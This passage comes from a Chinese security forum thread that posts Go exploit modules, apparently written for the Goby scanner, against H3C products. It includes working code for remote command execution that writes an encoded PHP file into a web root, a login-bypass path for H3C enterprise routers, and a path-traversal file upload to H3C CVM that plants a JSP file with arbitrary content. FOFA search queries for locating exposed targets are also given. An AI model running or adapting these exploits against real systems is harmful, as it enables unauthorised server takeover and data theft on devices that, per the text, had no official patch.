  24.       if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") {
  25.         return true
  26.       }
  27.     }
  28.     return false
  29.   }

  31.   checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
  32.     // 攻击 URL
  33.     requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php")
  34.     requestConfig.VerifyTls = false
  35.     requestConfig.FollowRedirect = false
  36.     requestConfig.Timeout = 15

  38.     // 发送攻击请求
  39.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  40.       if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) {
  41.         return true
  42.       }
  43.     }
  44.     return false
  45.   }

  47.   ExpManager.AddExploit(NewExploit(
  48.     goutils.GetFileName(),
  49.     expJson,
  50.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

  52.       // 生成随机文件名
  53.       randomFileName := goutils.RandomHexString(6)

  55.       // 漏洞攻击包,POC 使用自删除的文件
  56.       // <?php echo md5(233);unlink(__FILE__);
  57.       if exploitTopACM092348783482("echo PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pOw== |base64 -d >/var/www/html/"+randomFileName+".php", u) {
  58.         return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u)
  59.       }

  61.       return false
  62.     },
  63.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {

  65.       cmd := ss.Params["cmd"].(string)

  67.       if exploitTopACM092348783482(cmd, expResult.HostInfo) {
  68.         expResult.Success = true
  69.         expResult.Output = "命令执行成功"
  70.       }

  72.       return expResult
  73.     },
  74.   ))
  75. }

  77. // https://heiwado.cn:8443/
复制代码

10、H3C 企业路由器 (ER、ERG2、GR 系列) 任意用户登录/命令执行


/userLogin.asp/actionpolicy_status/

11、H3C CVM 前台任意文件上传漏洞


  1. package exploits

  3. import (
  4.   "git.gobies.org/goby/goscanner/goutils"
  5.   "git.gobies.org/goby/goscanner/jsonvul"
  6.   "git.gobies.org/goby/goscanner/scanconfig"
  7.   "git.gobies.org/goby/httpclient"
  8.   "strings"
  9. )

  11. func init() {
  12.   expJson := `{
  13.       "Name": "H3C CVM Arbitrary File Upload Vulnerability",
  14.       "Description": "<p><span style="color: var(--primaryFont-color);">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style="color: var(--primaryFont-color);">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
  15.       "Product": "H3C-CVM",
  16.   "Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
  17.   "DisclosureDate": "2022-05-25",
  18.   "Author": "su18@javaweb.org",
  19.   "FofaQuery": " server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")",
  20.   "GobyQuery": " server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")",
  21.   "Level": "3",
  22.       "Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
  23.       "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
  24.   "References": [
  25.     "https://fofa.so/"
  26.   ],
  27.   "Is0day": false,
  28.   "HasExp": true,
  29.   "ExpParams": [
  30.     {
  31.       "name": "fileName",
  32.       "type": "input",
  33.       "value": "evil",
  34.       "show": ""
  35.     },
  36.     {
  37.       "name": "fileContent",
  38.       "type": "input",
  39.       "value": "<%out.println("123");%>",
  40.       "show": ""
  41.     }
  42.   ],
  43.   "ExpTips": {
  44.     "Type": "",
  45.     "Content": ""
  46.   },
  47.   "ScanSteps": [
  48.     "AND",
  49.     {
  50.       "Request": {
  51.         "method": "GET",
  52.         "uri": "/test.php",
  53.         "follow_redirect": true,
  54.         "header": {},
  55.         "data_type": "text",
  56.         "data": ""
  57.       },
  58.       "ResponseTest": {
  59.         "type": "group",
  60.         "operation": "AND",
  61.         "checks": [
  62.           {
  63.             "type": "item",
  64.             "variable": "$code",
  65.             "operation": "==",
  66.             "value": "200",
  67.             "bz": ""
  68.           },
  69.           {
  70.             "type": "item",
  71.             "variable": "$body",
  72.             "operation": "contains",
  73.             "value": "test",
  74.             "bz": ""
  75.           }
  76.         ]
  77.       },
  78.       "SetVariable": []
  79.     }
  80.   ],
  81.   "ExploitSteps": [
  82.     "AND",
  83.     {
  84.       "Request": {
  85.         "method": "GET",
  86.         "uri": "/test.php",
  87.         "follow_redirect": true,
  88.         "header": {},
  89.         "data_type": "text",
  90.         "data": ""
  91.       },
  92.       "ResponseTest": {
  93.         "type": "group",
  94.         "operation": "AND",
  95.         "checks": [
  96.           {
  97.             "type": "item",
  98.             "variable": "$code",
  99.             "operation": "==",
  100.             "value": "200",
  101.             "bz": ""
  102.           },
  103.           {
  104.             "type": "item",
  105.             "variable": "$body",
  106.             "operation": "contains",
  107.             "value": "test",
  108.             "bz": ""
  109.           }
  110.         ]
  111.       },
  112.       "SetVariable": []
  113.     }
  114.   ],
  115.   "Tags": [
  116.     "Arbitrary File Creation"
  117.   ],
  118.   "VulType": [
  119.     "Arbitrary File Creation"
  120.   ],
  121.   "CVEIDs": [
  122.     ""
  123.   ],
  124.   "CNNVD": [
  125.     ""
  126.   ],
  127.   "CNVD": [
  128.     ""
  129.   ],
  130.   "CVSSScore": "8.0",
  131.   "Translation": {
  132.     "CN": {
  133.       "Name": "H3C CVM 前台任意文件上传漏洞",
  134.       "Product": "H3C-CVM",
  135.       "Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
  136.       "Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
  137.       "Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;"><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C CVM</span><span style="color: rgb(22, 28, 37); font-size: 16px;"> </span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
  138.       "VulType": [
  139.         "⽂件上传"
  140.       ],
  141.       "Tags": [
  142.         "⽂件上传"
  143.       ]
  144.     },
  145.     "EN": {
  146.       "Name": "H3C CVM Arbitrary File Upload Vulnerability",
  147.       "Product": "H3C-CVM",
  148.       "Description": "<p><span style="color: var(--primaryFont-color);">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style="color: var(--primaryFont-color);">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
  149.       "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href="http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/" target="_blank">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
  150.       "Impact": "<p><span style="color: rgb(22, 28, 37); font-size: 16px;">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
  151.       "VulType": [
  152.         "Arbitrary File Creation"
  153.       ],
  154.       "Tags": [
  155.         "Arbitrary File Creation"
  156.       ]
  157.     }
  158.   },
  159.   "AttackSurfaces": {
  160.     "Application": null,
  161.     "Support": null,
  162.     "Service": null,
  163.     "System": null,
  164.     "Hardware": null
  165.   }
  166. }`

  168.   exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {

  170.     // 上传文件
  171.     requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")
  172.     requestConfig.VerifyTls = false
  173.     requestConfig.FollowRedirect = false
  174.     requestConfig.Header.Store("Content-range", "bytes 0-10/20")
  175.     requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
  176.     requestConfig.Data = fileContent

  178.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  179.       if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ""success\\":true") {
  180.         return true
  181.       }
  182.     }

  184.     return false
  185.   }

  187.   checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {

  189.     requestConfig := httpclient.NewGetRequestConfig("/" + fileName)
  190.     requestConfig.VerifyTls = false
  191.     requestConfig.FollowRedirect = false

  193.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  194.       return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
  195.     }

  197.     return false
  198.   }

  200.   ExpManager.AddExploit(NewExploit(
  201.     goutils.GetFileName(),
  202.     expJson,
  203.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

  205.       rand := goutils.RandomHexString(6)
  206.       rand2 := goutils.RandomHexString(6)

  208.       if exploitUploadFile2398429842(rand2, "<%out.print(""+rand+"");%>", u) {
  209.         return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)
  210.       }

  212.       return false
  213.     },
  214.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {

  216.       fileContent := ss.Params["fileContent"].(string)
  217.       fileName := ss.Params["fileName"].(string)

  219.       if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {

  221.         expResult.Success = true
  222.         expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp"
  223.       }

  225.       return expResult
  226.     },
  227.   ))
  228. }
复制代码
DecoyMini·吉星 —— 高可扩展、安全、免费的企业级蜜罐系统
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-5-6 08:33 , Processed in 0.062539 second(s), 22 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表